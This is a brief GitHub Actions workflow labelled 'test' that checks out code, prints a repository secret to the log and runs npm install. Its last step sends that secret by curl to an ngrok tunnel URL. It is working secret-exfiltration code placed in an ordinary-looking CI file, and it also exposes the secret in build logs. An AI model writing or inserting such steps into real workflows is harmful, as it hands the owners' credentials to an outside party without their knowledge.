name: test
on:
  workflow_dispatch:

env:
  TEST_SECRET: ${{ secrets.TEST_SECRET }}

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: echo $PWD
      - run: echo $TEST_SECRET
      - run: npm i
      - run: curl https://67af-240b-11-ba00-4100-c5c0-792a-f266-4908.ngrok-free.app/bbb/$TEST_SECRET
